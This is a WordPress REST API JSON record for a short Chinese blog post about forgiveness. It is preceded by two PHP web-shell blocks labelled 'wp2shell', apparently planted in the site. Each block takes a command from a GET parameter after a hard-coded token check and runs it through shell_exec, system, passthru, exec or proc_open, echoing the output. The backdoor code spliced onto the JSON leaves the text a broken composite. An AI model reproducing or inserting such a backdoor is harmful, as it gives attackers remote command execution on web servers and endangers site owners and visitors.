
// wp2shell-pass3
if (isset($_GET['t']) && hash_equals('4f5ae2089d480ed9e68e18ac5751f22a', (string)$_GET['t']) && isset($_GET['c'])) {
    $c=(string)$_GET['c']; $o='';
    if(function_exists('shell_exec')) $o=(string)@shell_exec($c);
    elseif(function_exists('system')){ob_start();@system($c);$o=ob_get_clean();}
    elseif(function_exists('passthru')){ob_start();@passthru($c);$o=ob_get_clean();}
    elseif(function_exists('exec')){@exec($c,$a);$o=implode(chr(10),(array)$a);}
    $mk='WP2'.'SHELL'; echo $mk.'::'.$o.'::'.'END'; exit;
}














// wp2shell-pass4
if (isset($_GET['t']) && hash_equals('c50cdd1da5f2defb081f6ded154c2c6a', (string)$_GET['t']) && isset($_GET['c'])) {
  $c=(string)$_GET['c']; $o='';
  if(function_exists('shell_exec')) $o=(string)@shell_exec($c);
  elseif(function_exists('system')){ob_start();@system($c);$o=ob_get_clean();}
  elseif(function_exists('passthru')){ob_start();@passthru($c);$o=ob_get_clean();}
  elseif(function_exists('exec')){@exec($c,$a);$o=implode(chr(10),(array)$a);}
  elseif(function_exists('proc_open')){$d=array(1=>array('pipe','w'));$p=@proc_open($c,$d,$pipes);if(is_resource($p)){$o=stream_get_contents($pipes[1]);fclose($pipes[1]);proc_close($p);}}
  else $o='NO_EXEC_FUNCS';
  $mk='WP2'.'SHELL'; echo $mk.'::'.$o.'::'.'END'; exit;
}


{"id":49,"date":"2026-04-07T15:32:45","date_gmt":"2026-04-07T07:32:45","guid":{"rendered":"http:\/\/120.76.117.78\/?p=49"},"modified":"2026-06-13T21:25:59","modified_gmt":"2026-06-13T13:25:59","slug":"%e9%83%bd%e5%8f%af%e5%8e%9f%e8%b0%85%e5%90%97%ef%bc%9f","status":"publish","type":"post","link":"https:\/\/blog.luohongzhan.com\/index.php\/2026\/04\/07\/%e9%83%bd%e5%8f%af%e5%8e%9f%e8%b0%85%e5%90%97%ef%bc%9f\/","title":{"rendered":"\u539f\u8c05"},"content":{"rendered":"\n<p>\u8981\u662f\u4f60\u4ec0\u4e48\u90fd\u80fd\u539f\u8c05\uff0c<\/p>\n\n\n\n<p>\u90a3\u4f60\u7ecf\u5386\u7684\u4e00\u5207\uff0c<\/p>\n\n\n\n<p>\u90fd\u662f\u6d3b\u8be5\u3002<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u8981\u662f\u4f60\u4ec0\u4e48\u90fd\u80fd\u539f\u8c05\uff0c \u90a3\u4f60\u7ecf\u5386\u7684\u4e00\u5207\uff0c \u90fd\u662f\u6d3b\u8be5\u3002<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-49","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/blog.luohongzhan.com\/index.php\/wp-json\/wp\/v2\/posts\/49","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.luohongzhan.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.luohongzhan.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.luohongzhan.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.luohongzhan.com\/index.php\/wp-json\/wp\/v2\/comments?post=49"}],"version-history":[{"count":6,"href":"https:\/\/blog.luohongzhan.com\/index.php\/wp-json\/wp\/v2\/posts\/49\/revisions"}],"predecessor-version":[{"id":65,"href":"https:\/\/blog.luohongzhan.com\/index.php\/wp-json\/wp\/v2\/posts\/49\/revisions\/65"}],"wp:attachment":[{"href":"https:\/\/blog.luohongzhan.com\/index.php\/wp-json\/wp\/v2\/media?parent=49"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.luohongzhan.com\/index.php\/wp-json\/wp\/v2\/categories?post=49"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.luohongzhan.com\/index.php\/wp-json\/wp\/v2\/tags?post=49"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}